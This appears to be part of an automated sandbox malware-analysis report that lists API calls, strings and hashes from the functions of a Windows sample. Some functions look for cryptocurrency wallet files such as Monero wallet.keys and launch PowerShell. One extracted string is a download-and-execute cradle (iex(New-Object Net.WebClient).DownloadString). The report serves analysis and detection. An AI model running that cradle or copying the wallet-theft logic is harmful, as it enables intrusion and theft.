                                    • Opcode ID: cd3804737e460f9a1cae75d710f9bf4b0e1072dc6a90fbcef0441ffba12aa548
                                    • Instruction ID: 07959bcc81d9c69162c51d04c4ba20947e8e1b877b85735ece239bb786e8855f
                                    • Opcode Fuzzy Hash: cd3804737e460f9a1cae75d710f9bf4b0e1072dc6a90fbcef0441ffba12aa548
                                    • Instruction Fuzzy Hash: 4D212875A1021CABDB64DB54DC85FE9B3B8FB48704F00C1E8E609A6180DF71AA85CFE4
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001A99C5
                                    • Process32First.KERNEL32(0019A056,00000128), ref: 001A99D9
                                    • Process32Next.KERNEL32(0019A056,00000128), ref: 001A99F2
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001A9A4E
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 001A9A6C
                                    • CloseHandle.KERNEL32(00000000), ref: 001A9A79
                                    • CloseHandle.KERNEL32(0019A056), ref: 001A9A88
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 2696918072-0
                                    • Opcode ID: 22b67e36e992690141257d4642451594662658b62cd40d62aa0130c534428751
                                    • Instruction ID: 0247cb2eedd52ae028d3f520fcc44e0d34409289d2d0e14465d46ce923a27671
                                    • Opcode Fuzzy Hash: 22b67e36e992690141257d4642451594662658b62cd40d62aa0130c534428751
                                    • Instruction Fuzzy Hash: 88212C74910218EBDB25DFA1CC88BDEB7B5BB49304F0041D9E50AA7290D7B49EC4CF51
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001A78C4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001A78CB
                                    • RegOpenKeyExA.ADVAPI32(80000002,00E1B770,00000000,00020119,001A7849), ref: 001A78EB
                                    • RegQueryValueExA.ADVAPI32(001A7849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 001A790A
                                    • RegCloseKey.ADVAPI32(001A7849), ref: 001A7914
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3225020163-1022791448
                                    • Opcode ID: 13e94ef685f80df1d46faa0d58e3a9248a84ea3dcf0718071d59aa9dcdc746a3
                                    • Instruction ID: daa5e05bd5bf6e7e9a3ee77f45b56fcf340f4f148ac6eadd544f0ff74dc6fea4
                                    • Opcode Fuzzy Hash: 13e94ef685f80df1d46faa0d58e3a9248a84ea3dcf0718071d59aa9dcdc746a3
                                    • Instruction Fuzzy Hash: E10117B9A44309BFDB00DFE4DC49FAE7778EB44704F104595F605A7281E7B05A00CB95
                                    APIs
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0019A13C
                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0019A161
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 0019A181
                                    • ReadFile.KERNEL32(000000FF,?,00000000,0019148F,00000000), ref: 0019A1AA
                                    • LocalFree.KERNEL32(0019148F), ref: 0019A1E0
                                    • CloseHandle.KERNEL32(000000FF), ref: 0019A1EA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: 3eae9789b6d038916d2fb434585c251553ad73b70f79fbc820bec2c52c7266c7
                                    • Instruction ID: 62874def395c38ee82f44e6b062f10957de831856242b04b38f0a3d0325c1aee
                                    • Opcode Fuzzy Hash: 3eae9789b6d038916d2fb434585c251553ad73b70f79fbc820bec2c52c7266c7
                                    • Instruction Fuzzy Hash: E131FA74A00209EFDF14CFA4C885BEE77B5AF48704F508168E911A7290D774AA85CFA2
                                    APIs
                                    • lstrcat.KERNEL32(?,00E2E7A0), ref: 001A4A2B
                                      • Part of subcall function 001A8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001A8F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 001A4A51
                                    • lstrcat.KERNEL32(?,?), ref: 001A4A70
                                    • lstrcat.KERNEL32(?,?), ref: 001A4A84
                                    • lstrcat.KERNEL32(?,00E1AE50), ref: 001A4A97
                                    • lstrcat.KERNEL32(?,?), ref: 001A4AAB
                                    • lstrcat.KERNEL32(?,00E2DCA8), ref: 001A4ABF
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001A8F20: GetFileAttributesA.KERNEL32(00000000,?,00191B94,?,?,001B577C,?,?,001B0E22), ref: 001A8F2F
                                      • Part of subcall function 001A47C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 001A47D0
                                      • Part of subcall function 001A47C0: RtlAllocateHeap.NTDLL(00000000), ref: 001A47D7
                                      • Part of subcall function 001A47C0: wsprintfA.USER32 ref: 001A47F6
                                      • Part of subcall function 001A47C0: FindFirstFileA.KERNEL32(?,?), ref: 001A480D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                    • String ID:
                                    • API String ID: 2540262943-0
                                    • Opcode ID: a30d463c40cdaf2c763d8923e05ab9633ea284a1bbcdcc9fac4eacb394a0bc20
                                    • Instruction ID: 5049092768f6d4ddb7ff19c14ea9c0580d875334b92a54855d66171064f129f3
                                    • Opcode Fuzzy Hash: a30d463c40cdaf2c763d8923e05ab9633ea284a1bbcdcc9fac4eacb394a0bc20
                                    • Instruction Fuzzy Hash: 98315FB69002086BDB14EBB0DC95EED733CAB59700F404599B24596051FFB0A7C8CBA5
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 001A2FD5
                                    Strings
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 001A2F54
                                    • <, xrefs: 001A2F89
                                    • ')", xrefs: 001A2F03
                                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 001A2F14
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 3031569214-898575020
                                    • Opcode ID: 4bc7bdd4b5d3f7d2afb91fcd9dc825952bba98e57fb242477e8aee8960eea8b1
                                    • Instruction ID: 47326013864157affc4c02af6ee870419ecf8462adfbb98e5fba4beb11618a70
                                    • Opcode Fuzzy Hash: 4bc7bdd4b5d3f7d2afb91fcd9dc825952bba98e57fb242477e8aee8960eea8b1
                                    • Instruction Fuzzy Hash: 61410C75D502089ADB58FFA0C8A2FEDBB79AF25300F804459F11667192EF706A49CFA1
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: dllmain_raw$dllmain_crt_dispatch
                                    • String ID:
                                    • API String ID: 3136044242-0
                                    • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                    • Instruction ID: 50a6f89b7882a69e6860d3eee8fab7ccbb30833765e4f399afb42cdcf1d5bf42
                                    • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                    • Instruction Fuzzy Hash: 742181F2D2071AABEB219F55CC4197F3A69EB81B94F254316F80967292C3304D618FA0
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 001A6C0C
                                    • sscanf.NTDLL ref: 001A6C39
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001A6C52
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001A6C60
                                    • ExitProcess.KERNEL32 ref: 001A6C7A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$System$File$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 2533653975-0
                                    • Opcode ID: dca9872030f8ca9c9e2afbb89166e7db1c249f168bc7d933f963f9256976d4f4
                                    • Instruction ID: 2aacb426260354f16dd459ee81ea1b251aeca77efe96c58bee7739b37ab4839f
                                    • Opcode Fuzzy Hash: dca9872030f8ca9c9e2afbb89166e7db1c249f168bc7d933f963f9256976d4f4
                                    • Instruction Fuzzy Hash: 8121EBB5D14208ABCF04EFE4E8559EEB7B9BF48304F04856AE516A3250EB749608CB69
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001A7FC7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001A7FCE
                                    • RegOpenKeyExA.ADVAPI32(80000002,00E1B850,00000000,00020119,?), ref: 001A7FEE
                                    • RegQueryValueExA.ADVAPI32(?,00E2DE68,00000000,00000000,000000FF,000000FF), ref: 001A800F
                                    • RegCloseKey.ADVAPI32(?), ref: 001A8022
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 793c17ed73a12025594968e90565a0ac23e74adb963a47621e37e678edf23086
                                    • Instruction ID: 33b1fe324a387f86ed62f96b0bcb71b738e084934f21f154a84f66f7cb9380b4
                                    • Opcode Fuzzy Hash: 793c17ed73a12025594968e90565a0ac23e74adb963a47621e37e678edf23086
                                    • Instruction Fuzzy Hash: 53119EB5A44305EBD704CF94DD86FBFBBB8EB05B14F104269F611A7280E7B558008BA2
                                    APIs
                                    • StrStrA.SHLWAPI(00E2E6B0,00000000,00000000,?,00199F71,00000000,00E2E6B0,00000000), ref: 001A93FC
                                    • lstrcpyn.KERNEL32(00467580,00E2E6B0,00E2E6B0,?,00199F71,00000000,00E2E6B0), ref: 001A9420
                                    • lstrlen.KERNEL32(00000000,?,00199F71,00000000,00E2E6B0), ref: 001A9437
                                    • wsprintfA.USER32 ref: 001A9457
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpynlstrlenwsprintf
                                    • String ID: %s%s
                                    • API String ID: 1206339513-3252725368
                                    • Opcode ID: e6043fb5066c8fae0e36bff5c9029995532b1a2e753292335c92f365a1f9b2dc
                                    • Instruction ID: 3d7ee7d37c2a526a20f88816c16faea660eb21cc986b61aa5f1f8f0ad2f9dd90
                                    • Opcode Fuzzy Hash: e6043fb5066c8fae0e36bff5c9029995532b1a2e753292335c92f365a1f9b2dc
                                    • Instruction Fuzzy Hash: D2011E75514108FFCB04DFA8C954EAE7B78EB48308F108699F90A8B300E775AA40DB95
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001912B4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001912BB
                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001912D7
                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001912F5
                                    • RegCloseKey.ADVAPI32(?), ref: 001912FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 75042695a33e0e4a1b4afc0005e8ed5d5dc7acc091e6edaa1d4a9e732c981adb
                                    • Instruction ID: a5fd1a688ffe350690356e27abec8e02ac7cf8a069b813cb3399079d51a11467
                                    • Opcode Fuzzy Hash: 75042695a33e0e4a1b4afc0005e8ed5d5dc7acc091e6edaa1d4a9e732c981adb
                                    • Instruction Fuzzy Hash: 7D01E1B9A44209BFDB04DFD4DC99FAE7778EB48705F1041A5FA0597280E7B09A408B95
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String___crt$Type
                                    • String ID:
                                    • API String ID: 2109742289-3916222277
                                    • Opcode ID: cde2b6c02b19ad46c6b9dcc3b8e57fad6c091f603f6f9c88bd26c0e356f46da2
                                    • Instruction ID: 073925addb4f461d4fa9e4997ac82d66daf676de9246d57e13d39ddbb57f5ed0
                                    • Opcode Fuzzy Hash: cde2b6c02b19ad46c6b9dcc3b8e57fad6c091f603f6f9c88bd26c0e356f46da2
                                    • Instruction Fuzzy Hash: 7C4118B810079C9EDB318B28CC85FFB7BEC9B46314F1444E8E98A97146D3719A44CFA0
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 001A6903
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 001A69C6
                                    • ExitProcess.KERNEL32 ref: 001A69F5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                    • String ID: <
                                    • API String ID: 1148417306-4251816714
                                    • Opcode ID: 254bffcfa82663611e074c0a5f365936b497a5de972c365b18fbd5b4b4c0794d
                                    • Instruction ID: 2ff4af6df785e28042a6f1715be973d9cfb79640fe14e4fc39a68bae11a72307
                                    • Opcode Fuzzy Hash: 254bffcfa82663611e074c0a5f365936b497a5de972c365b18fbd5b4b4c0794d
                                    • Instruction Fuzzy Hash: E2313EB5901218ABDB54EFA0DC92FDEB778AF18300F804199F20567191EF746B48CF69
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,001B0E10,00000000,?), ref: 001A89BF
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001A89C6
                                    • wsprintfA.USER32 ref: 001A89E0
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 1695172769-2206825331
                                    • Opcode ID: 1c16980053b4c5b757dce83f8759dd026af0ab341c9aecc7dbfc6e5a3765a805
